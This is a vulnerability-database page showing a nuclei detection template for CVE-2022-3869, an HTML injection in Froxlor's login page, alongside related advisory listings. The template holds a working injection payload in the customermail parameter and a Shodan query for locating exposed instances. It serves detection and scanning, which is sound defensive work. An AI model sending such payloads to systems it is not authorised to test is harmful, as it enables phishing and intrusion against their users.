Lucene search
K

Froxlor < 0.10.38.2. - HTML Injection

๐Ÿ—“๏ธย 04 Jul 2026ย 03:00:48Reported byย ProjectDiscoveryTypeย 
nuclei
ย nuclei
๐Ÿ”—ย github.com๐Ÿ‘ย 30ย Views

Froxlor < 0.10.38.2. - HTML Injection. HTML Injection in GitHub repository froxlor/froxlor prior to 0.10.38.2

Related
Refs
Code
ReporterTitlePublishedViews
Family
Huntr
Html Injection Reflected in Login Page
4 Nov 202210:30
โ€“huntr
Circl
CVE-2022-3869
6 Nov 202206:07
โ€“circl
CNNVD
Froxlor ่ทจ็ซ™่„šๆœฌๆผๆดž
5 Nov 202200:00
โ€“cnnvd
CVE
CVE-2022-3869
5 Nov 202200:00
โ€“cve
Cvelist
CVE-2022-3869 Code Injection in froxlor/froxlor
5 Nov 202200:00
โ€“cvelist
Github Security Blog
Froxlor vulnerable to code injection
5 Nov 202219:00
โ€“github
NVD
CVE-2022-3869
5 Nov 202214:15
โ€“nvd
OSV
CVE-2022-3869 Code Injection in froxlor/froxlor
5 Nov 202200:00
โ€“osv
OSV
GHSA-6RJV-XXGR-V57X Froxlor vulnerable to code injection
5 Nov 202219:00
โ€“osv
Prion
Code injection
5 Nov 202214:15
โ€“prion
Rows per page
id: CVE-2022-3869

info:
  name: Froxlor < 0.10.38.2. - HTML Injection
  author: ctflearner
  severity: medium
  description: |
    HTML Injection in GitHub repository froxlor/froxlor prior to 0.10.38.2.
  impact: |
    Attackers can inject arbitrary HTML content through the customermail parameter, potentially displaying fake content to users and facilitating phishing attacks against Froxlor administrators.
  remediation: |
    Update Froxlor to version 0.10.38.2 or later that properly sanitizes the customermail parameter and encodes HTML output.
  reference:
    - https://huntr.com/bounties/7de20f21-4a9b-445d-ae2b-15ade648900b
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3869
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-3869
    cwe-id: CWE-79
    epss-score: 0.01265
    epss-percentile: 0.66169
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"Froxlor"
    product: froxlor
  tags: cve2022,cve,froxlor,html,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?showmessage=4&customermail=\"><h2>TEST</h2>"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'The message to ""><h2>TEST</h2>" failed'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b5d8df02c76601b97dff4e29eb8f1c2d17a011d2a3e2417d95cd4b1161c9c6a102202c640a318dde7c22483fadaab524b33cf2e86d2709ccb2d62d1b5cb4f2696e04:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 3.16.1
CVSS 36.5
EPSS0.01265
SSVC
30